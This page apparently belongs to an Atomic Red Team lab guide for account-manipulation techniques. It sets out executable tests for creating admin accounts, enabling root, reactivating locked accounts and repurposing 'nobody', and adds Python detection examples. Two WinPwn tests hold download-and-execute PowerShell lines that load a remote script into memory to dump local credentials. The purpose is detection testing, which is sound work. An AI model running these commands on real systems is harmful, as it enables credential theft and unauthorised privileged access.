Executable Atomic Red Team test cases for exercising this technique in a lab. Each test is tagged with its executor, whether it needs elevation, and the target platform. Copy a command, run it on the listed platform, and confirm your detections fire.
[command_prompt | elevated | windows] Create local account with admin privileges
After execution the new account will be active and added to the Administrators group
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
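Both commands in the test above land in the Windows Security log: `net user /add` as event 4720 (user account created) and `net localgroup administrators /add` as 4732 (member added to a security-enabled local group). The correlation below is an added example for this page, not Atomic Red Team code. The sample events are constructed, and the dictionary keys mirror the EventData field names (TargetSid, MemberSid, SubjectUserName); the function name and alert types are this example's own.

```python
"""Correlate Security events 4720 and 4732 to spot a freshly created local admin."""
from datetime import datetime, timedelta

# Well-known SID of BUILTIN\Administrators. 4732 carries the group as a SID, so match
# on that rather than on the display name, which is localised.
ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample events (not real telemetry); keys follow the Security log's
# EventData field names.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2024-05-01T10:00:00", "TargetUserName": "art-test",
     "TargetSid": "S-1-5-21-1-2-3-1105", "SubjectUserName": "admin"},
    {"EventID": 4732, "TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "Administrators",
     "TargetSid": "S-1-5-32-544", "MemberSid": "S-1-5-21-1-2-3-1105", "SubjectUserName": "admin"},
    {"EventID": 4720, "TimeCreated": "2024-05-01T11:00:00", "TargetUserName": "svc-backup",
     "TargetSid": "S-1-5-21-1-2-3-1106", "SubjectUserName": "admin"},
    {"EventID": 4732, "TimeCreated": "2024-05-01T11:00:01", "TargetUserName": "Backup Operators",
     "TargetSid": "S-1-5-32-551", "MemberSid": "S-1-5-21-1-2-3-1106", "SubjectUserName": "admin"},
    {"EventID": 4732, "TimeCreated": "2024-05-02T09:30:00", "TargetUserName": "Administrators",
     "TargetSid": "S-1-5-32-544", "MemberSid": "S-1-5-21-1-2-3-500", "SubjectUserName": "admin"},
]


def detect_new_local_admins(events, window=timedelta(minutes=10)):
    """Return alerts for accounts added to BUILTIN\\Administrators.

    'new_account_made_admin': a 4720 followed within `window` by a 4732 that adds the
    same SID to Administrators (exactly what the test above produces).
    'existing_account_made_admin': a 4732 into Administrators with no recent 4720.
    4732's MemberName is frequently '-' for local accounts, so the join key is MemberSid.
    """
    created = {}  # TargetSid -> (account name, creation time)
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (ev["TargetUserName"], ts)
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            member = ev["MemberSid"]
            hit = created.get(member)
            if hit and ts - hit[1] <= window:
                alerts.append({"type": "new_account_made_admin", "account": hit[0],
                               "sid": member, "by": ev["SubjectUserName"],
                               "time": ev["TimeCreated"]})
            else:
                alerts.append({"type": "existing_account_made_admin", "account": member,
                               "sid": member, "by": ev["SubjectUserName"],
                               "time": ev["TimeCreated"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_new_local_admins(SAMPLE_EVENTS):
        print(alert)
```

Adding a member to Backup Operators produces a 4732 as well, which is why the rule filters on the group SID instead of treating every 4732 as an admin grant.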
[bash | elevated | macos] Create local account with admin privileges - MacOS
After execution the new account will be active and added to the Administrators group
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
[bash | elevated | macos] Create local account with admin privileges using sysadminctl utility - MacOS
After execution the new account will be active and added to the Administrators group
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
[bash | elevated | macos] Enable root account using dsenableroot utility - MacOS
After execution the current/new user will have root access
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
[bash | elevated | macos] Add a new/existing user to the admin group using dseditgroup utility - macOS
After execution the current/new user will be added to the Admin group
dseditgroup -o edit -a art-user -t user admin
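The four macOS tests above all go through a small set of directory-services tools, so a process-execution rule can key on the command line rather than on file changes. The classifier below is an added example for this page, not Atomic Red Team code: it tokenises a command line and reports the account change it would make, treating the admin and wheel groups as privilege-granting. The command lines it recognises are the ones used in the tests above; the function name and the output fields are this example's own.

```python
"""Map macOS account-manipulation command lines to structured findings."""
import shlex

# Membership of either group confers administrative rights on macOS.
ADMIN_GROUPS = {"admin", "wheel"}


def _after(argv, flag):
    """Return the token following `flag` in argv, or None if absent."""
    if flag in argv:
        i = argv.index(flag)
        if i + 1 < len(argv):
            return argv[i + 1]
    return None


def classify_macos_account_cmd(cmdline):
    """Return a finding dict for a privileged local-account change, or None.

    Recognised: dscl (bare user-record creation, append to an admin group),
    sysadminctl -addUser (the -admin switch decides), dsenableroot, and
    dseditgroup -o edit -a <user> ... <group>.
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv:
        return None
    tool = argv[0].rsplit("/", 1)[-1]

    if tool == "dscl":
        target = _after(argv, "-append")
        if target and target.startswith("/Groups/") and "GroupMembership" in argv:
            group = target.rsplit("/", 1)[-1]
            user = _after(argv, "GroupMembership")
            if group in ADMIN_GROUPS and user:
                return {"tool": tool, "action": "grant_admin", "user": user, "group": group}
        target = _after(argv, "-create")
        # Only the bare "-create /Users/<name>" creates the record; the attribute
        # writes repeat -create with a key and value, and must not be double-counted.
        if target and target.startswith("/Users/") and argv.index("-create") + 2 == len(argv):
            return {"tool": tool, "action": "create_user",
                    "user": target.rsplit("/", 1)[-1], "admin": False}
        return None

    if tool == "sysadminctl":
        user = _after(argv, "-addUser")
        if user:
            admin = "-admin" in argv
            return {"tool": tool, "action": "create_admin_user" if admin else "create_user",
                    "user": user, "admin": admin}
        return None

    if tool == "dsenableroot":
        if "-d" in argv:  # -d disables the root account; not a finding
            return None
        return {"tool": tool, "action": "enable_root",
                "user": _after(argv, "-u") or "<current user>"}

    if tool == "dseditgroup":
        user = _after(argv, "-a")
        if _after(argv, "-o") == "edit" and user and argv[-1] in ADMIN_GROUPS:
            return {"tool": tool, "action": "grant_admin", "user": user, "group": argv[-1]}
        return None

    return None


if __name__ == "__main__":
    for line in ("dscl . -append /Groups/admin GroupMembership AtomicUser",
                 "sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin",
                 "dsenableroot -u art-tester -p art-tester -r art-root",
                 "dseditgroup -o edit -a art-user -t user admin"):
        print(classify_macos_account_cmd(line))
```

Feed it the CommandLine field of whatever process telemetry you collect on macOS; a plain `dscl . -create /Users/X` on its own is reported with `admin: False`, so the admin-group append is what should raise severity.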
[powershell | elevated | windows] WinPwn - Loot local Credentials - powerhell kittie
Runs WinPwn's "powerhell kittie" credential-looting function: the first line loads WinPwn.ps1 from the pinned commit straight into memory, the second calls obfuskittiedump non-interactively.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
[powershell | elevated | windows] WinPwn - Loot local Credentials - Safetykatz
Runs WinPwn's Safetykatz credential-looting function: the first line loads WinPwn.ps1 from the pinned commit straight into memory, the second calls safedump non-interactively.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
[bash | elevated | linux] Create local account (Linux)
An adversary may wish to create an account with admin privileges to work with. In this test we create an "art" user with the password art, switch to art, execute whoami and exit; deleting the art user is the cleanup step.
password=$(openssl passwd -1 art)
# Linux branch uses useradd; the FreeBSD fallback uses pw, reading the hash from stdin (-h 0)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password "$password" art) || (pw useradd art -g wheel -s /bin/sh && (echo "$password" | pw mod user art -h 0))
su art -c "whoami; exit"
[bash | elevated | linux] Reactivate a locked/expired account (Linux)
A system administrator may have locked and expired a user account rather than deleting it ("the user is coming back, at some stage"). An adversary may reactivate an inactive account in an attempt to appear legitimate.
In this test we create an "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
# expected to fail: the account is locked and its expiry date is in the past
su -c whoami art || echo "su failed as expected (account locked and expired)"
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art
[sh | elevated | linux] Reactivate a locked/expired account (FreeBSD)
A system administrator may have locked and expired a user account rather than deleting it ("the user is coming back, at some stage"). An adversary may reactivate an inactive account in an attempt to appear legitimate.
In this test we create an "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user art -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw usermod art -e +99d
su art
whoami
exit
[bash | elevated | linux] Login as nobody (Linux)
An adversary may try to re-purpose a system account to appear legitimate. In this test we change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look in `/etc/passwd` before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin`
grep '^nobody:' /etc/passwd
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su -c "whoami" nobody
[sh | elevated | linux] Login as nobody (freebsd)
An adversary may try to re-purpose a system account to appear legitimate. In this test we change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look in `/etc/passwd` before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin`
grep '^nobody:' /etc/passwd
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 nobody) | pw mod user nobody -h 0
su nobody
whoami
exit
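The two "nobody" tests and the reactivation tests before them all leave state behind that a host audit can pick up afterwards: a system account with an interactive shell, a usable password hash where `*` or `!` should be, an MD5-crypt (`$1$`) hash of the kind `openssl passwd -1` produces rather than the `$6$` hashes passwd(1) normally writes, a lock prefix, or an explicit expiry date. The audit below is an added example for this page, not Atomic Red Team code. It parses Linux /etc/passwd and /etc/shadow only (FreeBSD keeps the hash in /etc/master.passwd with a different field layout, which is not handled here); the sample file contents are constructed, and the finding names are this example's own.

```python
"""Audit passwd/shadow for repurposed system accounts and suspicious password state."""
from datetime import date

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}
SYSTEM_UID_MAX = 999   # Debian/RHEL default: UIDs below 1000 belong to system accounts
NOBODY_UID = 65534

# Constructed sample files, not copied from a real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/bin/bash
art:x:1001:1001::/home/art:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$examplehash:19800:0:99999:7:::
daemon:*:19800:0:99999:7:::
nobody:$1$saltsalt$examplehash:19845:0:99999:7:::
art:$1$saltsalt$examplehash:19845:0:99999:7::99999:
alice:!$6$saltsalt$examplehash:19800:0:99999:7:::
"""


def parse_passwd(text):
    """name -> {uid, gid, home, shell} from passwd(5) lines."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":")
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_shadow(text):
    """name -> {hash, lastchange, expire} from shadow(5) lines (days since epoch)."""
    entries = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(":")  # name:hash:lastchange:min:max:warn:inactive:expire:reserved
        entries[f[0]] = {"hash": f[1],
                         "lastchange": int(f[2]) if f[2] else None,
                         "expire": int(f[7]) if f[7] else None}
    return entries


def audit_accounts(passwd_text, shadow_text, today_days=None):
    """Return sorted (account, finding) pairs; `today_days` is days since the epoch."""
    if today_days is None:
        today_days = (date.today() - date(1970, 1, 1)).days
    passwd = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    findings = []
    for name, p in passwd.items():
        s = shadow.get(name, {})
        h = s.get("hash", "")
        if h in ("", "*", "!", "!!"):      # no password set at all
            locked, usable = False, False
        else:
            locked = h.startswith("!")      # what usermod --lock / passwd -l write
            usable = not locked
        is_system = p["uid"] != 0 and (p["uid"] <= SYSTEM_UID_MAX or p["uid"] == NOBODY_UID)
        if is_system and p["shell"] not in NOLOGIN_SHELLS:
            findings.append((name, "system_account_interactive_shell"))
        if is_system and usable:
            findings.append((name, "system_account_usable_password"))
        if usable and h.startswith("$1$"):  # MD5-crypt, i.e. set by hand (openssl passwd -1)
            findings.append((name, "md5_crypt_hash"))
        if locked:
            findings.append((name, "password_locked"))
        exp = s.get("expire")
        if exp is not None:
            findings.append((name, "account_expired" if exp < today_days else "expiry_set"))
    return sorted(findings)


if __name__ == "__main__":
    for item in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(item)
```

Run it against a baseline snapshot and again after the tests: the nobody entry should gain the interactive-shell and usable-password findings during the test and lose them after cleanup, and the art account's expiry flag should flip from expired to set when the account is renewed.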
[command_prompt | elevated | windows] Use PsExec to elevate to NT Authority\SYSTEM account
PsExec is a powerful tool best known for its remote management capability. However, it can also be used to run processes as the local system account.
The local system account is a default Windows account which has unrestricted access to all system resources.
Upon successful execution, PsExec.exe will spawn a command prompt which will run 'whoami' as the local system account and then exit.
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula -s %COMSPEC% /c whoami